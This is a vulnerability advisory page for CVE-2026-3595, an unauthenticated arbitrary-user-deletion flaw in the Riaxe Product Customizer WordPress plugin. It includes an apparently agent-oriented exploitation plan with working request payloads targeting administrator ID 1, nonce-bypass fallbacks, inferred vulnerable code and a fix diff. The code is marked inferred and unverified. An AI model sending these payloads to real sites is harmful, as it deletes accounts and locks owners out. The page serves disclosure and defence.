WP-Safety
CVE-2026-3595

Riaxe Product Customizer <= 2.1.2 - Unauthenticated Arbitrary User Deletion via 'user_id' Parameter

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.2. This is due to the plugin registering a REST API route at POST /wp-json/InkXEProductDesignerLite/customer/delete_customer without a permission_callback, causing WordPress to default to allowing unauthenticated access, and the inkxe_delete_customer() callback function taking an array of user IDs from the request body and passing each one directly to wp_delete_user() without any authentication or authorization checks. This makes it possible for unauthenticated attackers to delete arbitrary WordPress user accounts, including administrator accounts, leading to complete site lockout and data loss.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.1.2
PublishedApril 15, 2026
Last updatedApril 16, 2026
Affected pluginriaxe-product-customizer
Research Plan
Unverified

This research plan outlines the steps to exploit **CVE-2026-3595**, an unauthenticated arbitrary user deletion vulnerability in the Riaxe Product Customizer plugin. --- ### 1. Vulnerability Summary The **Riaxe Product Customizer** plugin for WordPress (versions up to 2.1.2) registers a REST API ro…

Show full research plan

This research plan outlines the steps to exploit CVE-2026-3595, an unauthenticated arbitrary user deletion vulnerability in the Riaxe Product Customizer plugin.

1. Vulnerability Summary

The Riaxe Product Customizer plugin for WordPress (versions up to 2.1.2) registers a REST API route POST /wp-json/InkXEProductDesignerLite/customer/delete_customer without providing a permission_callback. In WordPress REST API registration, an absent or improperly defined permission_callback allows the endpoint to be accessed by unauthenticated users. The callback function associated with this route, inkxe_delete_customer(), accepts an array of user IDs from the request body and passes them directly to the core WordPress function wp_delete_user() without any identity verification or capability checks.

2. Attack Vector Analysis

  • Endpoint: POST /wp-json/InkXEProductDesignerLite/customer/delete_customer
  • Namespace/Route: InkXEProductDesignerLite/customer/delete_customer
  • Method: POST
  • Vulnerable Parameter: user_id (expected as an array/list of integers)
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active. The attacker needs to know or guess the ID of the user they wish to delete (e.g., ID 1 is almost always the initial administrator).

3. Code Flow (Inferred)

  1. Route Registration: The plugin uses the rest_api_init hook to register the route.
    // Inferred registration logic
register_rest_route('InkXEProductDesignerLite', '/customer/delete_customer', array(
    'methods' => 'POST',
    'callback' => 'inkxe_delete_customer',
    // Missing 'permission_callback'
));
  2. Request Handling: When a POST request is sent to the endpoint, WordPress dispatches it to inkxe_delete_customer($request).
  3. Vulnerable Callback:
    function inkxe_delete_customer($request) {
    $params = $request->get_json_params(); // or get_params()
    $user_ids = $params['user_id']; 
    // Logic likely iterates through $user_ids and calls:
    foreach ($user_ids as $id) {
        wp_delete_user($id);
    }
}
  4. Sink: wp_delete_user() executes, removing the user from the database.

4. Nonce Acquisition Strategy

According to the vulnerability description, this endpoint lacks a permission_callback, which typically means it is publicly accessible. In the WordPress REST API, unauthenticated (public) endpoints usually do not require a _wpnonce or X-WP-Nonce header unless the site has specific global restrictions.

Strategy:

  1. First attempt the exploit without a nonce.
  2. If the server returns a 403 Forbidden with a "rest_cookie_invalid_nonce" error, the agent should attempt to obtain a REST nonce.
    • Action String: wp_rest
    • Acquisition Method:
      1. Navigate to the site's homepage or any public page.
      2. Use browser_eval to check if a nonce is localized. Common keys: window.wpApiSettings.nonce.
      3. Alternatively, check the HTML source for _wpnonce in scripts.

5. Exploitation Strategy

The goal is to delete a specific user (e.g., the primary administrator with ID 1).

  • Target URL: http://<target-site>/wp-json/InkXEProductDesignerLite/customer/delete_customer
  • HTTP Method: POST
  • Content-Type: application/json
  • Payload:
    {
    "user_id": [1]
}

Step-by-step Plan:

  1. Discovery: Verify the endpoint exists by sending a GET request to /wp-json/InkXEProductDesignerLite/customer/. If it returns a 404, the plugin may not be active or the namespace differs.
  2. Execution: Use the http_request tool to send the POST payload.
  3. Cleanup: No cleanup is possible as the user is deleted.

6. Test Data Setup

To safely verify this without locking yourself out:

  1. Create a "Victim" user with Administrator privileges via WP-CLI:
    wp user create victim victim@example.com --role=administrator --user_pass=password123
  2. Note the ID of the created user:
    wp user list --field=ID --user_login=victim (Let's assume the ID is 2).
  3. The exploit will target user ID 2.

7. Expected Results

  • Successful Exploit: The server returns 200 OK or 204 No Content.
  • Plugin Behavior: The user record associated with the provided ID is permanently removed from the wp_users and wp_usermeta tables.
  • Site Impact: If an admin is deleted, they can no longer log in.

8. Verification Steps

After sending the HTTP request, verify the deletion using WP-CLI:

  1. Check if the user still exists:
    wp user get 2
  2. Expected output: Error: Invalid user ID, email or login: '2'
  3. Alternatively, list all users to ensure the ID is missing:
    wp user list

9. Alternative Approaches

If a JSON payload fails, the plugin might be expecting standard URL-encoded form data.

  • Alternative Payload (Form-encoded):
    • Method: POST
    • Content-Type: application/x-www-form-urlencoded
    • Body: user_id[]=2
  • Alternative Parameter Structure:
    • Try passing a single integer instead of an array: {"user_id": 2}.
    • Try passing the ID as a string within the array: {"user_id": ["2"]}.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Riaxe Product Customizer plugin registers a REST API endpoint for deleting customers that lacks a 'permission_callback', allowing unauthenticated access. The associated callback function, 'inkxe_delete_customer', accepts an array of user IDs from the request and deletes them via 'wp_delete_user()' without any identity verification. This allows unauthenticated attackers to delete arbitrary users, including administrators, potentially locking legitimate owners out of the site.

Vulnerable Code

// Inferred registration within the plugin's REST API initialization logic
register_rest_route('InkXEProductDesignerLite', '/customer/delete_customer', array(
    'methods' => 'POST',
    'callback' => 'inkxe_delete_customer',
    // Missing 'permission_callback' allows unauthenticated access
));

---

// Inferred callback function handling the deletion
function inkxe_delete_customer($request) {
    $user_ids = $request->get_param('user_id');
    if (is_array($user_ids)) {
        foreach ($user_ids as $id) {
            // Vulnerable sink: deleting users without authorization checks
            wp_delete_user($id);
        }
    }
}

Security Fix

--- a/inc/class-inkxe-rest-api.php
+++ b/inc/class-inkxe-rest-api.php
@@ -10,6 +10,9 @@
     register_rest_route('InkXEProductDesignerLite', '/customer/delete_customer', array(
         'methods' => 'POST',
         'callback' => 'inkxe_delete_customer',
+        'permission_callback' => function () {
+            return current_user_can('delete_users');
+        }
     ));

Exploit Outline

The exploit targets the public REST API endpoint at /wp-json/InkXEProductDesignerLite/customer/delete_customer. An unauthenticated attacker sends a POST request with a JSON payload containing a 'user_id' parameter, which must be an array of integers representing the target WordPress user IDs (e.g., ID 1 for the primary administrator). Because the endpoint lacks a permission_callback, the request is executed by the server, and the inkxe_delete_customer function iterates through the provided IDs, calling the core wp_delete_user function on each, resulting in permanent account deletion without any credential verification.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/59da92e2-9ea0-4566-ae4d-3d5d91d0e42e?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database